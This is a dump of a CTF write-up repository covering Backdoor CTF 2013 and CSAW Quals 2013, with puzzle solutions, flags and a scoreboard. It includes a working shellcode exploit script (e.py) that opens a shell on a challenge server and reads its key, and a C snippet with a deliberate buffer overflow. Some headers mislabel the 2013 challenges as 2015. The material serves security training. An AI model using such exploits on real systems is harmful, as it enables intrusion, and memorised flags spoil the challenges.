17 | >
18 | >
19 | > The flag is the MD5 of the decrypted text.
20 | >
21 | >
22 | > HINT: Sometimes the most direct approach gives the answer
23 |
24 | ## Write-up
25 |
26 | (TODO)
27 |
28 | ## Other write-ups and resources
29 |
30 | * none yet
--------------------------------------------------------------------------------
/backdoorctf-2013/crypto/75/README.md:
--------------------------------------------------------------------------------
1 | # Backdoor CTF 2013: Crypto 75
2 |
3 | **Category:** Crypto
4 | **Points:** 75
5 | **Solves:**
6 | **Description:**
7 |
8 | > Decrypt this string 'RIVXR ITWZV OHVFM HVBMV HFVHC GLHEG RZHVR VS'
9 | >
10 | > Flag is the MD5 of decoded string.
11 | >
12 | > May the Force be with you !
13 | >
14 | > HINT: Wait a sec! was that Force or Source!
15 |
16 | ## Write-up
17 |
18 | (TODO)
19 |
20 | ## Other write-ups and resources
21 |
22 | * none yet
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/150/README.md:
--------------------------------------------------------------------------------
1 | # Backdoor CTF 2013: Forensics 150
2 |
3 | **Category:** Forensics
4 | **Points:** 150
5 | **Solves:**
6 | **Description:**
7 |
8 | > H4x0r decided he needs one more extra layer of advanced security. His access key is a QR code, and keeps the only copy in his wallet. But when leaving his castle he fell into the moat and the QR code got wet and disfigured. Now he cant get back into his own castle and desperately needs a real hacker's help. His post on craigslist says so. This is your chance to get into his head.
9 | >
10 | > Here is the disfigured QR code:-
11 | >
12 | > The Flag is md5 of last 13 characters of password hidden in [the QR](wet_QR.png).
13 | >
14 | > H4x0r promises to reward 150 h4x0rcoins anyone who gives him the password.
15 | >
16 | > HINT: Hmmm... Can't I just try and reverse the fading somehow?
17 |
18 | ## Write-up
19 |
20 | (TODO)
21 |
22 | ## Other write-ups and resources
23 |
24 | * none yet
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/150/wet_QR.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/150/wet_QR.png
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/250/README.md:
--------------------------------------------------------------------------------
1 | # Backdoor CTF 2013: Forensics 250
2 |
3 | **Category:** Forensics
4 | **Points:** 250
5 | **Solves:**
6 | **Description:**
7 |
8 | > h4x0r is fed up with all your attacks on his castle and has decided to retaliate by attacking us back. He sent us a mail with [this image](bbb.png) as a warning. Hope you can figure out his warning message:-
9 | >
10 | > MD5 of the message is the answer.
11 |
12 | ## Write-up
13 |
14 | We are given a picture:
15 |
16 | 
17 |
18 | Using `stegsolve`, we see that this picture contains a hidden binary text:
19 |
20 | 
21 |
22 | Extract these bits and convert them to `0`s and `1`s with this [script](get.py):
23 |
24 | ```bash
25 | $ python get.py
26 | 011011010110111101100100011001010111001001101110011101110110000101110010011001100110000101110010011001010000000000000000000000000000
27 | ```
28 |
29 | We convert the binary output to ASCII text using a small perl command and pipe the output to `xxd` to avoid scrambling our shell:
30 |
31 | ```bash
32 | $ python get.py | perl -lpe '$_=pack"B*",$_' | xxd
33 | 0000000: 6d6f 6465 726e 7761 7266 6172 6500 0000 modernwarfare...
34 | 0000010: 000a
35 | ```
36 |
37 | MD5 the resulting readable text and you got the flag:
38 |
39 | ```bash
40 | $ echo modernwarfare | md5
41 | 3c87b2bc2f0e1143ecb67aa8570ffc1b
42 | $ echo -n modernwarfare | md5
43 | d2432052b887f9e09fb8fa44b11861ef
44 | ```
45 |
46 | The flag is either `3c87b2bc2f0e1143ecb67aa8570ffc1b` or `d2432052b887f9e09fb8fa44b11861ef`.
47 | ## Other write-ups and resources
48 |
49 | * none yet
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/250/bbb.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/250/bbb.png
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/250/get.py:
--------------------------------------------------------------------------------
1 | from PIL import Image
2 | flag_img = Image.open("solved.bmp")
3 | w,h = flag_img.size
4 | msg=''
5 | for x in range(0, flag_img.size[1]):
6 | g,b,a = flag_img.getpixel((x,0))
7 | if g==255: msg +='0'
8 | else: msg+='1'
9 | print msg
10 |
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/250/solved.bmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/250/solved.bmp
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/300/0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/300/0.png
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/300/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/300/1.png
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/300/README.md:
--------------------------------------------------------------------------------
1 | # Backdoor CTF 2013: Forensics 300
2 |
3 | **Category:** Forensics
4 | **Points:** 300
5 | **Solves:**
6 | **Description:**
7 |
8 | > H4x0r has now learnt that simple text authentications are not the in thing today. Also since voice authentication is all the rage nowadays thanx to siri, he decided to get one for his castle. But he messed it big time and now has a audio file which he himself can't seem to decipher. So now he needs your help to get into his own castle.
9 | >
10 | > You can find the file [here](siri_audio.zip).
11 | >
12 | > Find the hidden passphrase, the flag is the MD5 of the passphrase.
13 | >
14 | > HINT: It is a audioWAVE. Sometimes you might have to see things instead of hearing them.
15 |
16 | ## Write-up
17 |
18 | This writeup is based on [h34dump](http://h34dump.com/2013/03/backdoorctf-2013-forensics-300/)'s writeup.
19 |
20 | We are given an audiowave file and open it with `audacity` and see this waveform:
21 |
22 | 
23 |
24 | We see that there are six 16 spikes/ 8 sin waves and imply that we can decode the waves:
25 |
26 | 
27 |
28 | as `0`
29 |
30 | and
31 |
32 | 
33 |
34 | as `1`.
35 |
36 | This results in the bitstream `011000100110000101101011011001000110111101110010`, which can be translated into ASCII characters using a simple perl command:
37 |
38 |
39 | ```bash
40 | $ echo 011000100110000101101011011001000110111101110010 | perl -lpe '$_=pack"B*",$_'
41 | bakdor
42 | $ echo -n bakdor
43 | e1b64df17443b51e3007fd3d5370dca1
44 | ```
45 |
46 | The flag is `e1b64df17443b51e3007fd3d5370dca1`.
47 |
48 | ## Other write-ups and resources
49 |
50 | *
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/300/siri_audio.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/300/siri_audio.zip
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/300/writeup.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/300/writeup.png
--------------------------------------------------------------------------------
/backdoorctf-2013/scoreboard.txt:
--------------------------------------------------------------------------------
1 | dcua 3815.000
2 | v3l0cityz3r0 3720.000
3 | Headump 3640.000
4 | p!r@t3s 3590.000
5 | Got Root 3515.000
6 | dnivra 3250.000
7 | botnet 3250.000
8 | sbi0s 3250.000
9 | bi0s 3250.000
10 | hellokitty 3225.000
11 | sakshi 3225.000
12 | 2sbi0s 3175.000
13 | 1338-offbyone 3175.000
14 | Beginbi0s 3100.000
15 | Inception 3050.000
16 | Graphite 2925.000
17 | NULL Life 2475.000
18 | ChocolateMakers 1850.000
19 | Akrockzzz 1550.000
20 | YouKnowWho 1425.000
21 | SsoMac 1400.000
22 | Inquisitive 1290.000
23 | hczi0npqu 1275.000
24 | webfuel 1225.000
25 | Rising Force 1200.000
26 | WeLoveCP 1200.000
27 | jayant 1120.000
28 | Testing 1120.000
29 | abhshkdz 1050.000
30 | weareplaying 1050.000
31 | 0x01 1000.000
32 | LOOLOO 1000.000
33 | bithin 975.000
34 | deception 900.000
35 | ufologists 850.000
36 | OneManTeam 775.000
37 | p03p0wn 650.000
38 | Protocol 625.000
39 | PR0T0C0L 625.000
40 | bond 600.000
41 | pwners 500.000
42 | xelenonz 500.000
43 | h4x0r 500.000
44 | MyTeam 425.000
45 | jofrutas 400.000
46 | w0rmicelli 400.000
47 | Spounchers 375.000
48 | redeemer 350.000
49 | The DHARMA Initiative 300.000
50 | pouet 300.000
51 | Nemotest 225.000
52 | Big Boss 200.000
53 | TSTORMXSD 200.000
54 | hack_123 200.000
55 | zorianix 150.000
56 | lolcode 140.000
57 | hawk_eye 50.000
58 | delirium 50.000
59 | A-Team 50.000
60 | Nuts 50.000
61 | TeamNuts 50.000
62 | nk_team 50.000
63 | L0L 50.000
64 | trackdown 50.000
65 | achilles 50.000
66 | D3molition 50.000
67 | Army Ants 50.000
68 | BOTNET_OM 50.000
69 | backdoor 50.000
70 | empire 50.000
71 | ANONYMOUS 50.000
72 | The Agents 50.000
73 | dumbass 50.000
74 | knightwave 50.000
75 | KISS 50.000
76 | oioioi 50.000
77 | GoDFathER 50.000
78 | theDuffers 50.000
79 | dvjbndlsh93 50.000
80 | paglab 20.000
81 |
--------------------------------------------------------------------------------
/csaw-quals-2013/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF write-ups
2 |
3 | *
4 | * [Scoreboard](https://ctftime.org/event/96) or [here](scoreboard.txt)
5 | * [Number of solves per task](solves.txt)
6 |
7 | ## Completed write-ups
8 |
9 | * [misc/black-and-white-100](misc/black-and-white-100)
10 | * [misc/deeeeeeaaaaaadbeeeeeeeeeef-200](misc/deeeeeeaaaaaadbeeeeeeeeeef-200)
11 | * [misc/network1-50](misc/network1-50)
12 | * [misc/network2-50](misc/network2-50)
13 |
14 | ## External write-ups only
15 |
16 | * none yet
17 |
18 | ## Missing write-ups
19 |
20 | * [crypto/csawpad-100](crypto/csawpad-100)
21 | * [crypto/onlythisprogram-300](crypto/onlythisprogram-300)
22 | * [crypto/slurp-500](crypto/slurp-500)
23 | * [exploitation/csawdiary-300](exploitation/csawdiary-300)
24 | * [exploitation/exploit1-100](exploitation/exploit1-100)
25 | * [exploitation/exploit2-200](exploitation/exploit2-200)
26 | * [exploitation/miteegashun-400](exploitation/miteegashun-400)
27 | * [exploitation/scp-hack-500](exploitation/scp-hack-500)
28 | * [misc/life-300](misc/life-300)
29 | * [reversing/bikinibonanza-150](reversing/bikinibonanza-150)
30 | * [reversing/crackme-300](reversing/crackme-300)
31 | * [reversing/csaw2013reversing1-100](reversing/csaw2013reversing1-100)
32 | * [reversing/csaw2013reversing2-200](reversing/csaw2013reversing2-200)
33 | * [reversing/dotnet-100](reversing/dotnet-100)
34 | * [reversing/impossible-500](reversing/impossible-500)
35 | * [reversing/keygenme-400](reversing/keygenme-400)
36 | * [reversing/noobs-first-firmware-mod-500](reversing/noobs-first-firmware-mod-500)
37 | * [web/cryptomatv2-400](web/cryptomatv2-400)
38 | * [web/guess-harder-100](web/guess-harder-100)
39 | * [web/herpderper-300](web/herpderper-300)
40 | * [web/nevernote-200](web/nevernote-200)
41 | * [web/widgetcorp-400](web/widgetcorp-400)
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/csawpad-100/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: CSAWpad
2 |
3 | **Category:** Crypto
4 | **Points:** 100
5 | **Solves:** 141
6 | **Description:**
7 |
8 | > [csawpad.py](csawpad.py)
9 |
10 | ## Write-up
11 |
12 | (TODO)
13 |
14 | ## Other write-ups and resources
15 |
16 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: onlythisprogram
2 |
3 | **Category:** Crypto
4 | **Points:** 300
5 | **Solves:** 127
6 | **Description:**
7 |
8 | > [onlythisprogram.tgz](onlythisprogram.tgz)
9 |
10 | ## Write-up
11 |
12 | (TODO)
13 |
14 | ## Other write-ups and resources
15 |
16 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/onlythisprogram.tgz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/onlythisprogram.tgz
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/README:
--------------------------------------------------------------------------------
1 | QUESTION TEXT:
2 |
3 | I tested out my new encryption tool on some files from the internet and it seems like it worked pretty good. What do you think?
4 |
5 | FILE: onlythisprogram.tgz
6 |
7 | HINT (if necessary):
8 |
9 | You don't have to figure out the whole key to solve the challenge. Some file formats make better oracles than others.
10 |
11 | SOLVE:
12 |
13 | See solve.py for my half-solution with explanation.
14 |
15 | KEY:
16 |
17 | BuildYourOwnCryptoSoOthersHaveJobSecurity
18 |
19 | echo "For some reason psifertex really likes figlets. In this case it's necessary because the file size should not be a huge giveaway. Though I suppose images would have worked too. Anyway, the key is: BuildYourOwnCryptoSoOthersHaveJobSecurity"|sed 's/ / /g'|figlet -w 3000|gzip > key
20 |
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/Hackers.mid:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/Hackers.mid
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/Tux_ecb.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/Tux_ecb.jpg
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/diagram.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/diagram.png
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/enigma.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/enigma.jpg
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/key.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/key.gz
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/linux-penguin5_blastfishing_com.bmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/linux-penguin5_blastfishing_com.bmp
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/logo.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/logo.gif
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/nelson.doc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/nelson.doc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/input/shannon1948.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/shannon1948.pdf
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/onlythisprogram.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | import os
3 | import sys
4 | import argparse
5 |
6 | blocksize=256
7 |
8 | parser = argparse.ArgumentParser(description="Custom encryption algorithm because a friend said that's the way to do it. Anyway, it's called 'Only This Program' since I'm pretty sure that only this program can securely decrypt the files as long as you don't give out your secret.dat file created when you encrypt something.")
9 | parser.add_argument('--infile', metavar='i', nargs='?', type=argparse.FileType('r'), help='input file, defaults to standard in', default=sys.stdin)
10 | parser.add_argument('--outfile', metavar='o', nargs='?', type=argparse.FileType('wb'), help='output file, defaults to standard out', default=sys.stdout)
11 | parser.add_argument('--secretkey', metavar='s', nargs='?', type=argparse.FileType('a+'), help='output file, defaults to secretkey.dat', default='secretkey.dat')
12 |
13 | args = parser.parse_args()
14 |
15 |
16 | sys.stderr.write('\nReading random bytes from OS. If hung, please introduce entropy.\n')
17 |
18 | args.secretkey.truncate()
19 |
20 | while (args.secretkey.tell() < blocksize):
21 | # maybe remove the next line for release since it makes it more obvious the key only generates once?
22 | sys.stdout.write('.')
23 | args.secretkey.write(os.urandom(1))
24 |
25 | counter=0
26 | args.secretkey.seek(0)
27 | keydata = args.secretkey.read(blocksize)
28 |
29 | while 1:
30 | byte = args.infile.read(1)
31 | if not byte:
32 | break
33 | args.outfile.write(chr(ord(keydata[counter % len(keydata)]) ^ ord(byte)))
34 | counter+=1
35 |
36 | sys.stderr.write('\nSecret keyfile: %s\nInput file: %s\nOutput file: %s\nTotal bytes: %d \n' % (args.secretkey.name, args.infile.name, args.outfile.name, counter))
37 |
38 |
39 |
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file0.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file0.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file1.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file1.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file2.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file2.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file3.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file3.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file4.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file4.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file5.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file5.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file6.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file6.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file7.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file7.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file8.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file8.enc
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/runme.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | rm -rf output
3 | mkdir output
4 | rm secretkey.dat
5 | for file in input/*
6 | do
7 | ./onlythisprogram.py --infile $file --outfile output/file$((COUNT++)).enc
8 | done
9 |
10 |
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/onlythisprogram-300/source/secretkey.dat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/secretkey.dat
--------------------------------------------------------------------------------
/csaw-quals-2013/crypto/slurp-500/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: slurp
2 |
3 | **Category:** Crypto
4 | **Points:** 500
5 | **Solves:** 27
6 | **Description:**
7 |
8 | > We've found the source to the Arstotzka spies rendevous server, we must find out their new vault key.
9 | >
10 | > [slurp.py](slurp.py)
11 | >
12 | > nc 128.238.66.222 7788
13 |
14 | ## Write-up
15 |
16 | (TODO)
17 |
18 | ## Other write-ups and resources
19 |
20 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/csawdiary-300/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: CSAW Diary
2 |
3 | **Category:** Exploitation
4 | **Points:** 300
5 | **Solves:** 116
6 | **Description:**
7 |
8 | > nc 128.238.66.217 34266
9 | >
10 | > [fil_chal](fil_chal)
11 |
12 | ## Write-up
13 |
14 | (TODO)
15 |
16 | ## Other write-ups and resources
17 |
18 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/csawdiary-300/fil_chal:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/exploitation/csawdiary-300/fil_chal
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/exploit1-100/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: Exploitation 1
2 |
3 | **Category:** Exploitation
4 | **Points:** 100
5 | **Solves:** 701
6 | **Description:**
7 |
8 | > nc 128.238.66.212 31337
9 | >
10 | > [exploit1](exploit1)
11 | >
12 | > [exploit1.c](exploit1.c)
13 |
14 | ## Write-up
15 |
16 | (TODO)
17 |
18 | ## Other write-ups and resources
19 |
20 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/exploit1-100/exploit1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/exploitation/exploit1-100/exploit1
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/exploit1-100/exploit1.c:
--------------------------------------------------------------------------------
1 | [snip]
2 |
3 | void handle(int newsock) {
4 | int backdoor = 0;
5 | char buffer[1016];
6 | memset(buffer, 0, 1016);
7 |
8 | send(newsock, "Welcome to CSAW CTF.", 21, 0);
9 | recv(newsock, buffer, 1020, 0);
10 | buffer[1015] = 0;
11 |
12 | if ( backdoor ) {
13 | fd = fopen("./key", "r");
14 | fscanf(fd, "%s\n", buffer);
15 | send(newsock, buffer, 512, 0);
16 | }
17 | close(newsock);
18 | }
19 |
20 | [snip]
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/exploit2-200/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: Exploitation 200
2 |
3 | **Category:** Exploitation
4 | **Points:** 200
5 | **Solves:** 198
6 | **Description:**
7 |
8 | > nc 128.238.66.212 31338
9 | >
10 | > [exploit2](exploit2)
11 |
12 | ## Write-up
13 |
14 | (TODO)
15 |
16 | ## Other write-ups and resources
17 |
18 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/exploit2-200/e.py:
--------------------------------------------------------------------------------
1 | import socket
2 |
3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
4 | s.connect(("128.238.66.212", 31338))
5 |
6 | i = s.recv(4)
7 | j = s.recv(4)
8 | print s.recv(100)
9 |
10 | payload = (("\x90"*100) +
11 | ("\x89\xe1\x66\x31\xc9\x31\xdb\xb3\x14\x31\xd2\xb2\x04\x4b\x75\x02\xcd\x03\x31\xc0\xb0\x03\xcd\x80\x3c\x04\x75\xf1\x81\x39\x0d\xf0\xfe\xca\x75\xe9\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\xb0\x0b\x89\xe3\x31\xc9\x31\xd2\xcd\x80") +
12 | (j*473) +
13 | (i*10))
14 |
15 | s.send(payload)
16 | s.send("\x0d\xf0\xfe\xca")
17 | s.send("cat key\n")
18 | print s.recv(100)
19 |
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/exploit2-200/exploit2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/exploitation/exploit2-200/exploit2
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/miteegashun-400/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: miteegashun
2 |
3 | **Category:** Exploitation
4 | **Points:** 400
5 | **Solves:** 85
6 | **Description:**
7 |
8 | > nc 128.238.66.221 5930
9 | >
10 | > [miteegashun](miteegashun)
11 |
12 | ## Write-up
13 |
14 | (TODO)
15 |
16 | ## Other write-ups and resources
17 |
18 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/miteegashun-400/miteegashun:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/exploitation/miteegashun-400/miteegashun
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/scp-hack-500/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: SCP-hack
2 |
3 | **Category:** Exploitation
4 | **Points:** 500
5 | **Solves:** 7
6 | **Description:**
7 |
8 | > The SCP organization (http://128.238.66.211:45000) wants you to join, accept and see if you can take advantage of their interns sloppy coding and outdated browser.
9 |
10 | ## Write-up
11 |
12 | (TODO)
13 |
14 | ## Other write-ups and resources
15 |
16 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/exploitation/scp-hack-500/solution.txt:
--------------------------------------------------------------------------------
1 | http://blog.dragonsector.pl/2013/09/csaw-ctf-quals-2013-scp-hack.html
2 |
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/black-and-white-100/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: Black & White
2 |
3 | **Category:** Misc
4 | **Points:** 100
5 | **Solves:** 818
6 | **Description:**
7 |
8 | > [chal.png](chal.png)
9 |
10 | ## Write-up
11 |
12 | We are given a PNG that seems to be just white.
13 |
14 | However, using a steganography tool like [stegsolve](https://aur.archlinux.org/packages/stegsolve/), we see the flag in the blue, red or green 0 pane:
15 |
16 | 
17 |
18 | The flag is `key{forensics_is_fun}`.
19 |
20 | ## Other write-ups and resources
21 |
22 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/black-and-white-100/chal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/black-and-white-100/chal.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/black-and-white-100/key.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/black-and-white-100/key.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/1.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/2.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/IMG_0707.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/IMG_0707.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: deeeeeeaaaaaadbeeeeeeeeeef
2 |
3 | **Category:** Misc
4 | **Points:** 200
5 | **Solves:** 224
6 | **Description:**
7 |
8 | > [IMG_0707.png](IMG_0707.png)
9 |
10 | ## Write-up
11 |
12 | We are given a corrupt PNG file:
13 |
14 | ```bash
15 | $ file IMG_0707.png
16 | IMG_0707.png: PNG image data, 3264 x 1681, 8-bit/color RGBA, non-interlaced
17 | $ pngcheck IMG_0707.png
18 | IMG_0707.png CRC error in chunk IHDR (computed fcc410a8, expected c1d0b3e4)
19 | ERROR: IMG_0707.png
20 | ```
21 |
